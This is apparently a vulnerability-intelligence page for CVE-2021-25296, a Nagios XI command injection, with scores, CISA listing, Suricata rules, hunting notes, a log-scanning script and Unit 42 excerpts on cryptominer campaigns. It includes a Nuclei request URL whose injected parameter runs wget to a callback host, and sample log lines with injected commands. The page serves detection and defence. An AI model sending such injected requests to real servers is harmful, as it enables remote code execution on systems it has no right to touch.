CVE-2021-25296
Published 2021-02-15. Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file…
Priority: P1 · 92 · high · CVSS 3.1 base score 8.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-02-01
Exploited in the wild
EPSS: 71.74% (99.3th percentile)
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nagios | nagios_xi | 5.5.6 – 5.7.5 | — |
Detection & IOCs (extracted from sources)
Nuclei request URL: /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b
Snort/Suricata rule:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"plugin_output_len="; pcre:"/^[0-9]{1,10}\x3b/R"; reference:cve,2021-25296; classtype:attempted-admin; sid:2034992; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- Exploit targets GET /nagiosxi/config/monitoringwizard.php with wizard=windowswmi and a semicolon-injected plugin_output_len parameter (e.g., plugin_output_len=9999;<command>). Monitor for a numeric value followed immediately by %3b or a literal semicolon in that parameter.
- Hunt for running processes matching systemd-py-run.sh, systemd-run.py, systemd-udevd-run.sh, systemd-udevd.sh, workrun.sh, or systemd-dev as indicators of XMRig deployment post-exploitation.
- Check for the presence of dropper/persistence scripts in /usr/lib/dev and /tmp/usr/lib as post-exploitation artifacts.
- Palo Alto Threat Prevention signature 90873 covers this exploit; use it as a reference SID for tuning equivalent IDS/IPS rules.
- Emerging Threats Snort/Suricata SID 2034992 directly detects CVE-2021-25296 exploitation attempts against nagiosxi/config/monitoringwizard.php with a semicolon-injected plugin_output_len value.
- Exploitation requires valid Nagios XI credentials; this is an authenticated RCE, not an unauthenticated one. Detection rules should account for the authenticated session flow (login → obtain nsp token → exploit request).
- The vulnerable backend file /html/config/monitoringwizard.php is encrypted with SG11; analysis must be performed on the include file windowswmi.inc.php instead.
- The same Metasploit module also covers CVE-2021-25297 (switch wizard) and CVE-2021-25298 (cloud-vm wizard); detections scoped only to windowswmi will miss those related exploitation paths.
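The detection logic from the notes above, applied to web-server access logs, as an added example (not code from any of the listed sources): it mirrors the ET rule's check for a numeric plugin_output_len followed by a semicolon on the windowswmi wizard, and the sibling rule's check for a semicolon shortly after ip_address= (the CVE-2021-25297/25298 paths). The log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jan/2022:10:01:02 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=abc&nextstep=3&wizard=windowswmi&ip_address=127.0.0.1&plugin_output_len=9999%3bid%3b HTTP/1.1" 200 512
10.0.0.6 - - [27/Jan/2022:10:02:03 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=abc&nextstep=3&wizard=windowswmi&ip_address=10.1.1.1&plugin_output_len=1024 HTTP/1.1" 200 512
10.0.0.7 - - [27/Jan/2022:10:03:04 +0000] "GET /nagiosxi/config/monitoringwizard.php?update=1&nsp=abc&nextstep=3&wizard=switch&ip_address=10.1.1.1%3bid HTTP/1.1" 200 512
10.0.0.8 - - [27/Jan/2022:10:04:05 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 512
"""

REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# Same shape as the ET rule's pcre /^[0-9]{1,10}\x3b/R, applied after URL decoding.
INJECTED_LEN = re.compile(r"^[0-9]{1,10};")


def parse_query(query):
    """Split on '&' only and decode each value; keeps ';' inside a value intact."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.setdefault(unquote_plus(key), unquote_plus(value))
    return params


def inspect_uri(uri):
    """Return a finding for a suspicious monitoringwizard request, else None."""
    parts = urlsplit(uri)
    if "nagiosxi/config/monitoringwizard.php" not in parts.path:
        return None
    params = parse_query(parts.query)
    length = params.get("plugin_output_len", "")
    if params.get("wizard") == "windowswmi" and INJECTED_LEN.match(length):
        return f"CVE-2021-25296: plugin_output_len={length!r}"
    # SID 2034993 looks for a ';' within 30 bytes of ip_address=, regardless of wizard.
    ip_addr = params.get("ip_address", "")
    if ";" in ip_addr[:30]:
        return f"CVE-2021-25297/25298 pattern: ip_address={ip_addr!r}"
    return None


def scan_log(text):
    """Return (source_ip, finding) for every log line that matches a pattern."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if m:
            src, _ts, _method, uri, _status = m.groups()
            hit = inspect_uri(uri)
            if hit:
                findings.append((src, hit))
    return findings
```

Because the rules only fire on an authenticated session, pairing each hit with the preceding login and nsp token request from the same source narrows false positives.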
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.0 | CRITICAL | AV:N/AC:L/Au:S/C:C/I:C/A:C |
| vulncheck | — | 8.8 | HIGH | — |
| cisa | — | 8.8 | HIGH | — |
GHSA
GHSA-8hgr-54hv-7pgc: Nagios XI version xi-5
ghsa_unreviewed·2022-05-24
CVE-2021-25296 [HIGH] CWE-78 GHSA-8hgr-54hv-7pgc: Nagios XI version xi-5
Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.
VulnCheck
Nagios XI OS Command Injection
vulncheck·2021·CVSS 8.8
CVE-2021-25296 [HIGH] CWE-78 Nagios XI OS Command Injection
Nagios XI OS Command Injection
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Affected: Nagios Nagios XI
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
Remediation Due: 2022-02-01
CISA
Nagios XI OS Command Injection
cisa·2022-01-18·CVSS 8.8
CVE-2021-25296 [HIGH] CWE-78 Nagios XI OS Command Injection
Vulnerability: Nagios XI OS Command Injection
Affected: Nagios Nagios XI
Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-25296
Remediation Due Date: 2022-02-01
Suricata
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
suricata·2025-01-09·CVSS 6.1
CVE-2021-25299 [MEDIUM] ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS [Perch Security] Nagios XI Web SSH Terminal sshterm Cross-Site Scripting (CVE-2021-25299)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/nagiosxi/admin/sshterm.php?"; startswith; fast_pattern; content:"url="; nocase; pcre:"/^.+(script|onerror|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D)/Ri"; reference:url,www.connectwise.com/resources/cve-spotlight-nagios-xi-cve-2021-25296-25297-25298-25299; reference:cve,2021-25299; classtype:web-application-attack; sid:2059094; rev:2; metadata:affected_product
Suricata
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)
suricata·2022-01-27·CVSS 8.8
CVE-2021-25296 [HIGH] ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25296)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"plugin_output_len="; pcre:"/^[0-9]{1,10}\x3b/R"; reference:cve,2021-25296; classtype:attempted-admin; sid:2034992; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
suricata·2022-01-27·CVSS 8.8
CVE-2021-25296 [HIGH] ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Nagios XI OS Command Injection (CVE-2021-25297 & CVE-2021-25298)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"nagiosxi/config/monitoringwizard.php?"; fast_pattern; content:"ip_address="; content:"|3b|"; within:30; reference:cve,2021-25296; reference:cve,2021-25297; classtype:attempted-admin; sid:2034993; rev:1; metadata:attack_target Server, created_at 2022_01_27, cve CVE_2021_25296_CVE_2021_25297, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2022_01_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id
Nuclei
Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
nuclei·CVSS 8.8
CVE-2021-25296 [HIGH] Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injection. There is improper sanitization of authenticated user-controlled input by a single HTTP request via the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php. This in turn can lead to remote code execution, by which an attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2021-25296
info:
name: Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection
author: k0pak4
severity: high
description: |
Nagios XI 5.5.6 through 5.7.5 is susceptible to authenticated remote command injectio
Metasploit
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
metasploit·CVSS 8.8
CVE-2021-25296 [HIGH] Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection
This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
blogs_unit42·2023-06-22·CVSS 9.8
CVE-2019-12725 [CRITICAL] IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
## Executive Summary
Since March 2023, Unit 42 researchers have observed threat actors leveraging several IoT vulnerabilities to spread a variant of the Mirai botnet. The vulnerabilities exploited include those listed in the following table:
| CVE/Product | Description |
|---|---|
| CVE-2019-12725 | Zeroshell Remote Command Execution Vulnerability |
| CVE-2019-17621 | D-Link DIR-859 Remote Command Injection Vulnerability |
| CVE-2019-20500 | D-Link DWL-2600AP Remote Command Execution Vulnerability |
| CVE-2021-25296 | Nagios XI Remote Command Injection Vulnerability |
| CVE-2021-46422 | Telesquare SDT-CW3B1 Router Command Injection Vulnerability |
| CVE-2022-27002 | Arris TR3300 Remote Command Injection Vulnerability |
| CVE-2022-29303 | SolarView Compact Command Injection Vulnerability |
| CVE-2022-30023 | Tenda HG9 Router Command Injectio |
Unit42
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits (same post as above)
blogs_unit42·2023-06-22·CVSS 9.8
Authors: Chao Lei, Zhibin Zhang, Yiheng An, Cecilia Hu. Published: June 22, 2023.
Tagged CVEs: CVE-2019-12725, CVE-2019-17621, CVE-2019-20500, CVE-2021-25296, CVE-2021-46422, CVE-2022-27002, CVE-2022-29303, CVE-2022-30023, CVE-2022-30525, CVE-2022-31499, CVE-2022-36266, CVE-2022-40005, CVE-2022-45699, CVE-2023-1389, CVE-2023-25280, CVE-2023-27240
Tags: Trend Reports, Vulnerabilities, Botnet, IoT, IoT Security, Mirai
Unit42
Network Attack Trends: February-April 2021
blogs_unit42·2021-07-01
Network Attack Trends: February-April 2021
## Executive Summary
Unit 42 researchers observed network attack trends, February-April 2021. In the following sections, we present our analysis of the most recently published vulnerabilities, including the severity and category. Additionally, we provide insight into how the vulnerabilities are actively exploited in the wild based on real-world data collected from Palo Alto Networks Next-Generation Firewalls. We then draw conclusions about the most commonly exploited vulnerabilities the attackers are using, as well as the severity, category and origin of each attack.
## Network Attack Trends February-April 2021: Analysis of the Latest Published Vulnerabilities
From February-April 2021, a total of 4,969 new Common Vulnerabilities and Exposures (CVE) numbers were registered. To better und
Unit42
Network Attack Trends: February-April 2021 (same post as above)
blogs_unit42·2021-07-01
Authors: Yue Guan, Lei Xu, Vaibhav Singhal, Brock Mammen. Published: July 1, 2021.
Tags: Trend Reports, Vulnerabilities, Network security trends
Unit42
Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
blogs_unit42·2021-04-15·CVSS 8.8
CVE-2021-25296 [HIGH] Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers?
## Executive Summary
On March 16, 2021, Unit 42 researchers observed an attacker targeting Nagios XI software to exploit the vulnerability CVE-2021-25296, a remote command injection vulnerability impacting Nagios XI version 5.7.5, to conduct a cryptojacking attack and deploy the XMRig coinminer on victims’ devices. At the time of writing, the attack is still ongoing.
Nagios XI is a widely-used software that provides enterprise server and network monitoring solutions. The feature in Nagios XI that is under exploitation is “Configuration Wizard: Windows Management Instrumentation (WMI)”.
XMRig coin miner is an open-source cross-platform cryptocurrency miner. A successful attack will deploy an XMRig coinminer on the compromised devices.
Upgrading Nagios XI to the latest version mitigates
Unit42
Are Your Nagios XI Servers Turning Into Cryptocurrency Miners for Attackers? (same post as above)
blogs_unit42·2021-04-15·CVSS 8.8
Authors: Haozhe Zhang, Vaibhav Singhal, Zhibin Zhang, Qi Deng. Published: April 15, 2021.
Tags: Threat Research, Vulnerabilities, Command injection, Cryptocurrency mining, Cryptojacking, CVE-2021-25296, Nagios, XMRig
References
- http://nagios.com
- http://packetstormsecurity.com/files/161561/Nagios-XI-5.7.5-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/170924/Nagios-XI-5.7.5-Remote-Code-Execution.html
- https://assets.nagios.com/downloads/nagiosxi/versions.php
- https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md
- https://www.fastly.com/blog/anatomy-of-a-command-injection-cve-2021-25296-7-8-with-metasploit-module-and
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-25296
Timeline
- 2021-02-15: Published
- 2022-01-18: Added to CISA KEV
- Exploited in the wild